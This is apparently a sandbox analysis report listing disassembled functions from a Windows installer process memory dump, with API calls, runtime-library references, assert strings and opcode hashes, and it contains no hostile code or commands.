                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$QueryValuewsprintf
                                                                                                                        • String ID: \StringFileInfo\%04x%04x\FileDescription
                                                                                                                        • API String ID: 252175919-3471089032
                                                                                                                        • Opcode ID: 02a5c8339185992c5c4d84bc5a1fbe1db6955d66c91ca8f27a0ca79d06678ff9
                                                                                                                        • Instruction ID: cb70ad06a484e3c7bfdb32e5a40ee4478ba52280a2c4421d75afc062f0000845
                                                                                                                        • Opcode Fuzzy Hash: 02a5c8339185992c5c4d84bc5a1fbe1db6955d66c91ca8f27a0ca79d06678ff9
                                                                                                                        • Instruction Fuzzy Hash: 720126B194022C9ACB24DB90CC95FFEB3B8EF84304F1041DEE95B57142DA709A80CFA1
                                                                                                                        Function 00B30390 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 00B303A4
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00B303B5
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 00B303C8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Find$Long
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 189972333-2988720461
                                                                                                                        • Opcode ID: 1f09dbf8fa8661ab0ba8a318fb0932e051dae033d57171061ead491fc0670bcd
                                                                                                                        • Instruction ID: 8f71fe1287d3b8694eed758781ea3fa7e5fc03c4b5a12d5f3cace5a19dde2ee6
                                                                                                                        • Opcode Fuzzy Hash: 1f09dbf8fa8661ab0ba8a318fb0932e051dae033d57171061ead491fc0670bcd
                                                                                                                        • Instruction Fuzzy Hash: 17E06D3268272523DA3121996C51F8A52889FA9B71F210292F614BB2D04AD0EC4115E8
                                                                                                                        Function 00B04860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window
                                                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                        • API String ID: 2353593579-1331251348
                                                                                                                        • Opcode ID: 5709400e229e1368ddf9d9001b82cfd727265662be2eeaff3a460cfa0e180ec4
                                                                                                                        • Instruction ID: 57f34cf6296645cbd0f85731cf76437cb2dce5f5edbe01048ec435662b9fdf04
                                                                                                                        • Opcode Fuzzy Hash: 5709400e229e1368ddf9d9001b82cfd727265662be2eeaff3a460cfa0e180ec4
                                                                                                                        • Instruction Fuzzy Hash: 82F0E966B503146BD6302951FC02F0B7FD8DBA1F60F0481B4FE08262C1E7B4950186E2
                                                                                                                        Function 00B06310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDeviceCaps.GDI32(?,0000000E), ref: 00B06322
                                                                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 00B06329
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice
                                                                                                                        • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                                                        • API String ID: 328075279-4292231205
                                                                                                                        • Opcode ID: 2fc63ceacedea27233e7c72ed74e2c15e481ca1437ddd00036a9d422bf2bc596
                                                                                                                        • Instruction ID: 31490022a7c1e4db82cdba8c83e7ced4c279d2b456ec4d796038332fc374c91b
                                                                                                                        • Opcode Fuzzy Hash: 2fc63ceacedea27233e7c72ed74e2c15e481ca1437ddd00036a9d422bf2bc596
                                                                                                                        • Instruction Fuzzy Hash: 84E04F27B9132837F61021996C86F8AB7CCAB95BA8F050172FF08BB2D2D5D5AD0047E0
                                                                                                                        Function 00B24850 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B24877
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 00B2489C
                                                                                                                          • Part of subcall function 00B3CC21: _doexit.LIBCMT ref: 00B3CC2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$LocalMessageTime_doexit_mallocwvsprintf
                                                                                                                        • String ID: Assert failed, file %hs, line %d$WINST32
                                                                                                                        • API String ID: 3844741748-2703300672
                                                                                                                        • Opcode ID: d270410e8fb842ec8a521ec6f9bdeaad46b2b3e2d4a3d50c9656124cc65d426f
                                                                                                                        • Instruction ID: fb75957137a8e683aaa2739295cec8afba5da7b740deebf651460d53dcec60c8
                                                                                                                        • Opcode Fuzzy Hash: d270410e8fb842ec8a521ec6f9bdeaad46b2b3e2d4a3d50c9656124cc65d426f
                                                                                                                        • Instruction Fuzzy Hash: A3F03EB594030D6BDB14EFE4DC4AF5577BCEB04704F408494F71957192EAB0B6448F55
                                                                                                                        Function 00B12FAF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 00B12FBE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 00B12FCF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: _TrackMouseEvent$comctl32.dll
                                                                                                                        • API String ID: 2574300362-2314894490
                                                                                                                        • Opcode ID: 937131bd6c74a5dbe22033928dc5bb47d82733829ec8387ff8ddd6517d1cc1de
                                                                                                                        • Instruction ID: 0dfaa88e2331623990c659815e493c75318e8355062505b3c86f0592a5539563
                                                                                                                        • Opcode Fuzzy Hash: 937131bd6c74a5dbe22033928dc5bb47d82733829ec8387ff8ddd6517d1cc1de
                                                                                                                        • Instruction Fuzzy Hash: 07C012B82413029ECB001F28AC88B423BA8E710B0AF80048AF016832F0FFBCC040DB68
                                                                                                                        Function 00B374D7 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2782032738-0
                                                                                                                        • Opcode ID: 9b3dec1c82373722532c2f7c0ddb0a24596b00127aa110e2029f7ecbda38095e
                                                                                                                        • Instruction ID: cf287f4aa62d8df915c6914e54b0c3195e5a077b856a43f037c77ca893a1e53a
                                                                                                                        • Opcode Fuzzy Hash: 9b3dec1c82373722532c2f7c0ddb0a24596b00127aa110e2029f7ecbda38095e
                                                                                                                        • Instruction Fuzzy Hash: 6641B3B1A487059BDB398F698895A9EBBF5EF90320F3585EDE41597240DF70ED40CB40
                                                                                                                        Function 00B4AADA Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B4AB0E
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00B4AB41
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,00B55FC8,00000109,00BFBBEF,00000003), ref: 00B4AB72
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00B55FC8,00000109,00BFBBEF,00000003), ref: 00B4ABE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: b2e45e825541417e0f1713069e146d719b98466f51040415b44104b53cc95477
                                                                                                                        • Instruction ID: ad2c2d194ba00b47122155f07ee3ab78f2ab3a1c3954c2bfd9e59645dae0a5d5
                                                                                                                        • Opcode Fuzzy Hash: b2e45e825541417e0f1713069e146d719b98466f51040415b44104b53cc95477
                                                                                                                        • Instruction Fuzzy Hash: 0F31CD31A44246EFDB20DFA4C8859AE7BE6EF01310F1485E9E4619B191E730DE41EB52
                                                                                                                        Function 00B1E130 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B1E184
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B1E199
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1338273076-0
                                                                                                                        • Opcode ID: 20afdad4ea43f3a9bceafb899b410ac23c1e9f9016dcb04b833ae922257915ee
                                                                                                                        • Instruction ID: 30b22c6677a85e32664f0378f094bac0ddd126b97a27dd00b4a94f68d921b5b6
                                                                                                                        • Opcode Fuzzy Hash: 20afdad4ea43f3a9bceafb899b410ac23c1e9f9016dcb04b833ae922257915ee
                                                                                                                        • Instruction Fuzzy Hash: 5E31AB75A003049FD714DF98C540AAABBF8EF18700F1084DEE8699B792E770EE44CBA1
                                                                                                                        Function 00AE20B0 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AE20E8
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00AE2117
                                                                                                                        • _fputs.LIBCMT ref: 00AE2122
                                                                                                                        • _fputc.LIBCMT ref: 00AE212A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__alloca_probe_16_fputc_fputs
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1846584904-0
                                                                                                                        • Opcode ID: a519d2fe114866df750f938073d11aadd3021474cd3cc81a4e4b415ca9706fca
                                                                                                                        • Instruction ID: ae97ef5998a41d28299cbcc118c6813f92ba29c04d7be21b3922acd6f9ca6c4c
                                                                                                                        • Opcode Fuzzy Hash: a519d2fe114866df750f938073d11aadd3021474cd3cc81a4e4b415ca9706fca
                                                                                                                        • Instruction Fuzzy Hash: 2C21A135600204ABCB249F58DC86FAB77A9EF89300F588194FE459F395EA70AE05C7E1
                                                                                                                        Function 00B1D3A0 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B1D3F4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B1D409
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1338273076-0
                                                                                                                        • Opcode ID: d1f81fe2d1a215b36e93b968527c1fbfae2f713df5c421825153a66fc9fdcd35
                                                                                                                        • Instruction ID: 5457a2bb552af61507c219103c604eb26c277d00da24b472b6aa2e6d4f2093d3
                                                                                                                        • Opcode Fuzzy Hash: d1f81fe2d1a215b36e93b968527c1fbfae2f713df5c421825153a66fc9fdcd35
                                                                                                                        • Instruction Fuzzy Hash: FE319F755053049FC714DF98D941A9ABBF8EB18700F0089AEE85997782E770EE04CBA1
                                                                                                                        Function 00B20510 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B20562
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B20577
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1338273076-0
                                                                                                                        • Opcode ID: 3ce4a21f9091de65fd92f476388dca2d2e4b5c08c8e002112584afbed9c8f3dc
                                                                                                                        • Instruction ID: d79ad28130702c98f9cb1bc5d0555a0ec77e561aa6d6338f38fa00d3026f5a69
                                                                                                                        • Opcode Fuzzy Hash: 3ce4a21f9091de65fd92f476388dca2d2e4b5c08c8e002112584afbed9c8f3dc
                                                                                                                        • Instruction Fuzzy Hash: 7E218F759013089FC714DF98C941A9ABBF8EF18700F10899DE91D97782E770EA04CBA2
                                                                                                                        Function 00B3CC89 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B3CCA5
                                                                                                                          • Part of subcall function 00B38F7B: __getptd.LIBCMT ref: 00B38F8E
                                                                                                                        • ___ascii_memicmp.LIBCMT ref: 00B3CCEF
                                                                                                                        • __tolower_l.LIBCMT ref: 00B3CD1B
                                                                                                                        • __tolower_l.LIBCMT ref: 00B3CD2B
                                                                                                                          • Part of subcall function 00B3CFC7: __getptd_noexit.LIBCMT ref: 00B3CFC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale__tolower_l$UpdateUpdate::____ascii_memicmp__getptd__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1835730711-0
                                                                                                                        • Opcode ID: 33b9b7ad60b65ccabe42463e6ad59b4ca6d5ae444126265c353e74844712a964
                                                                                                                        • Instruction ID: dcd506312faa93003e5b8bf14acf8ea8bfbcca57ae1f6ac64fc2b346d5a68b07
                                                                                                                        • Opcode Fuzzy Hash: 33b9b7ad60b65ccabe42463e6ad59b4ca6d5ae444126265c353e74844712a964
                                                                                                                        • Instruction Fuzzy Hash: D8215C71800249ABCF219FA8C8456AE7FF5EB01319F3406E9F4217A191EB309E51CBA2
                                                                                                                        Function 00B2E409 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$_wcsncpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1526229385-0
                                                                                                                        • Opcode ID: cbda79a0ddc888ec878f3f97bc5325328c945fba4107494a832cd1accfb96657
                                                                                                                        • Instruction ID: 1507537ecfeb3865c52fc5e34360b889c07f5743910195f10dc68a8fbca15304
                                                                                                                        • Opcode Fuzzy Hash: cbda79a0ddc888ec878f3f97bc5325328c945fba4107494a832cd1accfb96657
                                                                                                                        • Instruction Fuzzy Hash: B4214C72C0023186DB302B29AC4697E73F5DB42710F198AE5F4BE9B2D1FB70D9854293
                                                                                                                        Function 00AEA610 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FromString$_free_malloc
                                                                                                                        • String ID:
